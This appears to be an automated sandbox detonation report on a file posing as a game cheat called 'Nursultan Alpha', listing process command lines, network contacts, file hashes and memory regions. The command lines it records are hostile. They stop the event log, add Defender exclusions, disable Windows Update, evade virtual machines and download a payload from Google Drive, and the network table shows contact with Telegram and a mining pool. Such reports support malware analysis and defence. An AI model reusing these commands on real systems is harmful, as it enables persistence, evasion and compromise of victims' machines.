C:\Windows\system32\sc.exe create "RLNALEWN" binpath= "C:\ProgramData\htsdqitpnkda\zrgqfbcavrkx.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "RLNALEWN"
C:\ProgramData\htsdqitpnkda\zrgqfbcavrkx.exe
C:\ProgramData\htsdqitpnkda\zrgqfbcavrkx.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\svchost.exe
svchost.exe
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://appdata/
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:932 CREDAT:275457 /prefetch:2
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\Desktop\Nursultan Alpha\start.bat" "
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Alpha\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Alpha\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Alpha\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Alpha\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Alpha\start.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Alpha\start.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Alpha\start.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Alpha\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Alpha\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Alpha\start.bat"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
C:\Windows\system32\wscript.exe
wscript /b
C:\Windows\system32\timeout.exe
timeout 0
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\doskey.exe
doskey CD=RECOVER
C:\Windows\system32\doskey.exe
doskey TYPE=ROBOCOPY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://drive.usercontent.google.com/u/0/uc?id=1uH0vQ_juAop0fqiOEIdPBdq1AMQmvndT&export=download', 'C:\Users\Admin\AppData\Local\Temp\java.rar')"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:443 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\kdotDEbKM.bat
| MD5 | efbd5d5781ef79c05a56b97edf9228b1 |
| SHA1 | 4d3e26689d111abdbd5f0d872532e5de1efe4599 |
| SHA256 | 43842e162c505a78cdbb80ba1ae88d7c770f6943d6968ff1a0895acf3b9213e1 |
| SHA512 | 82764fcf34549d975d17a662bca27afc1be610f4be0aa5840664e55f1d1fc572f5fae67f6f20e51bea5b16df6a7a54e949ebcb2ba55c8f00323ed7afe7cbc976 |
memory/2236-59-0x000007FEF5E4E000-0x000007FEF5E4F000-memory.dmp
memory/2236-60-0x000000001B630000-0x000000001B912000-memory.dmp
memory/2236-61-0x0000000001EF0000-0x0000000001EF8000-memory.dmp
memory/2236-62-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp
memory/2236-63-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp
memory/2236-64-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp
memory/2236-65-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp
memory/2236-66-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\kdotGLHDwq.bat
| MD5 | 337065424ed27284c55b80741f912713 |
| SHA1 | 0e99e1b388ae66a51a8ffeee3448c3509a694db8 |
| SHA256 | 4ef6f5f73f87cd552bf0dceb245365c44996f94eb72aeb2ccefe440fe055043b |
| SHA512 | d9290f0aa33e11da2ec88165b8133623e3f1633a9df8f477dfab395f655dc9a1d2dc82e8eae1d8eeae950ea2dd1e08054e1b258a0f2a0b4d4ca124db08e42e5a |
C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\kdotGLHDwq.bat
| MD5 | fc6844c64fc58a66642bc9143f133d8b |
| SHA1 | 692447aa8771bb139eb90a1e5d196c839b6f41c7 |
| SHA256 | 25777a08d3f8167ddc0a959d79308eb368c5e87ba33be46155c761fb4df07454 |
| SHA512 | cbba71fb05552201b92261e382451b82d6fe5d83029b4e21db214fc01b28efb8dcdf9f0bbff0dfec984bf99d9b0b9119c766365c9052327a71e0c7db443197e1 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 90efe29e54c0684ca2aebfcae783bd7f |
| SHA1 | cd7492dc84d33b2f9bf75060b004c45737929314 |
| SHA256 | 1a2f246f33994c0d287af0d54072003eab5a2c238454640e4298e39b005af3e8 |
| SHA512 | 090dcafba2ac99d00ac79652464741a6e5671a6aa16e3991dfcf0bacf69600cb3f2df1ddd6d05c2e936a85e860745dd4e23e21779d0d3d4992532406188174b1 |
memory/2988-83-0x000000001B7F0000-0x000000001BAD2000-memory.dmp
memory/2988-84-0x0000000001D90000-0x0000000001D98000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1544-112-0x000000001B5C0000-0x000000001B8A2000-memory.dmp
memory/1504-151-0x000000001B740000-0x000000001BA22000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\java.rar
| MD5 | e72a64d106458f9060515c13f83acc4b |
| SHA1 | b175aadb8b24204369a4e7a9ba4bd73d88b0c20a |
| SHA256 | 1591b9b01a110d92fdcb036f148e6861e2b199dd8ab331f61c7a0764760be06e |
| SHA512 | 8548d2eb7a8cb2e8a04581e9fd5c9aad60838270c0c038b876679e39fa876a0b707185888e04b63e15486f1197efd084ea584b5f1fdea11f147d93b8e042fd54 |
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\optionsof.exe
| MD5 | c51ac4b445ba39b6a826fe95e4c8015b |
| SHA1 | d87925eb0e55ec13a1fa9700d2f2308445a9bf83 |
| SHA256 | a636706ceed3032a0b2ccab47dad288f9e1d02c01b4fb7a8529291fc32736776 |
| SHA512 | b859aa84aeef68bc17e3afb962f27bfde8265ee3142b38465cb697ae3396834273e51d4a4255b06bf1ad9edc76817fcea31e4460384a952cb33731e383b3d708 |
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\java8-update.exe
| MD5 | c9a04bf748d1ee29a43ac3f0ddace478 |
| SHA1 | 891bd4e634a9c5fec1a3de80bff55c665236b58d |
| SHA256 | a6ce588a83f2c77c794e3584e8ac44e472d26cf301bb2bf0468bcabae55070bc |
| SHA512 | e17edb74f5cb4d8aabb4c775ec25a271f201da3adcb03541b1919526c0939694a768affc21c3066327e57c13bc9bb481074e51e4e78867df847b26f063b4c115 |
memory/2928-227-0x0000000000E90000-0x0000000000EAC000-memory.dmp
C:\Windows\system32\drivers\etc\hosts
| MD5 | 3a9662312614b856b548c94bc410cd23 |
| SHA1 | e008df0cd134359e2ae897975f5a258cdda67cef |
| SHA256 | d47944cc0756d7b558fd2ee5cc0e1f8aeb195c22b5fa40c912130d1c36958395 |
| SHA512 | 435a8555c0c90668baaf10c6c9e016b651bb14b1f0fe0427dade063d7de65621fd1bbb75e667276e5ba8049e30d4f018b86b5267df0b7b731c1cc314eaede2ed |
memory/2792-265-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2792-271-0x00000000000B0000-0x00000000000D0000-memory.dmp
memory/2792-276-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2792-274-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2792-273-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2792-272-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2792-270-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2792-268-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2792-267-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2792-275-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2792-266-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2792-264-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2792-269-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2888-259-0x0000000140000000-0x000000014000E000-memory.dmp
memory/2888-258-0x0000000140000000-0x000000014000E000-memory.dmp
memory/2888-257-0x0000000140000000-0x000000014000E000-memory.dmp
memory/2888-256-0x0000000140000000-0x000000014000E000-memory.dmp
memory/2888-255-0x0000000140000000-0x000000014000E000-memory.dmp
memory/2888-262-0x0000000140000000-0x000000014000E000-memory.dmp
memory/2792-277-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2792-278-0x0000000140000000-0x0000000140848000-memory.dmp
C:\Users\Admin\Desktop\Nursultan Alpha\kdotDEbKM.bat
| MD5 | 806c0f6be64541e921ae112a6180941c |
| SHA1 | 796aff362a7647a77625ccdbd51ce8fcc3403db9 |
| SHA256 | cc9065cfb43157b7f7d3b270c17b04a8c3e10fd4c22d9cddac6795327fa9625b |
| SHA512 | 54139b72f59da76d51c44c1d2cbc06c5c7fcb783a1db80cf82c6c5b9ac8c12410b4d46579d65a8d589d6de29716d8e11437313f1d4cfd3c0fdd8b5375c9c390e |
memory/1528-349-0x000000001B660000-0x000000001B942000-memory.dmp
memory/1528-350-0x0000000001EA0000-0x0000000001EA8000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q6PEJL8YZ8QKRW8UQB3I.temp
| MD5 | 5ac73cab9c76451af33b48ef95fc53e1 |
| SHA1 | 3ea7f041ed69defd27a99ed895707738684ffe13 |
| SHA256 | e0a15e29eefd13fc4942f5324f29ba25f194d4c003dfe8c528d355e612d7db0c |
| SHA512 | 257187d9b04f4d47744f49afc391d1a21a52b77c2324cc6156abe584615670c029b073d0aac8746240babe24a15c3c0f06cf5260dc0b8ea8c205d27312bd0ea6 |
memory/2136-367-0x000000001B670000-0x000000001B952000-memory.dmp
memory/2136-368-0x0000000002790000-0x0000000002798000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-27 18:35
Reported
2024-06-27 18:38
Platform
win10v2004-20240611-en
Max time kernel
148s
Max time network
153s
Command Line
Signatures
Hide Artifacts: Ignore Process Interrupts
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.15.31.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\kdotDEbKM.bat
| MD5 | efbd5d5781ef79c05a56b97edf9228b1 |
| SHA1 | 4d3e26689d111abdbd5f0d872532e5de1efe4599 |
| SHA256 | 43842e162c505a78cdbb80ba1ae88d7c770f6943d6968ff1a0895acf3b9213e1 |
| SHA512 | 82764fcf34549d975d17a662bca27afc1be610f4be0aa5840664e55f1d1fc572f5fae67f6f20e51bea5b16df6a7a54e949ebcb2ba55c8f00323ed7afe7cbc976 |
C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\kdotYKoIC.bat
| MD5 | 337065424ed27284c55b80741f912713 |
| SHA1 | 0e99e1b388ae66a51a8ffeee3448c3509a694db8 |
| SHA256 | 4ef6f5f73f87cd552bf0dceb245365c44996f94eb72aeb2ccefe440fe055043b |
| SHA512 | d9290f0aa33e11da2ec88165b8133623e3f1633a9df8f477dfab395f655dc9a1d2dc82e8eae1d8eeae950ea2dd1e08054e1b258a0f2a0b4d4ca124db08e42e5a |
memory/372-55-0x00007FFB19313000-0x00007FFB19315000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2krcugb2.3ps.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/372-65-0x0000026C9E720000-0x0000026C9E742000-memory.dmp
memory/372-66-0x00007FFB19310000-0x00007FFB19DD1000-memory.dmp
memory/372-67-0x00007FFB19310000-0x00007FFB19DD1000-memory.dmp
memory/372-68-0x0000026C9E780000-0x0000026C9E7AA000-memory.dmp
memory/372-69-0x0000026C9E780000-0x0000026C9E7A4000-memory.dmp
memory/372-72-0x00007FFB19310000-0x00007FFB19DD1000-memory.dmp
memory/372-73-0x00007FFB19310000-0x00007FFB19DD1000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-27 18:35
Reported
2024-06-27 18:38
Platform
win7-20240611-en
Max time kernel
118s
Max time network
121s
Command Line
Signatures
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha By Fleshk.zip"
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-27 18:35
Reported
2024-06-27 18:38
Platform
win10v2004-20240611-en
Max time kernel
132s
Max time network
104s
Command Line
Signatures
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha By Fleshk.zip"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.104:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.15.31.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |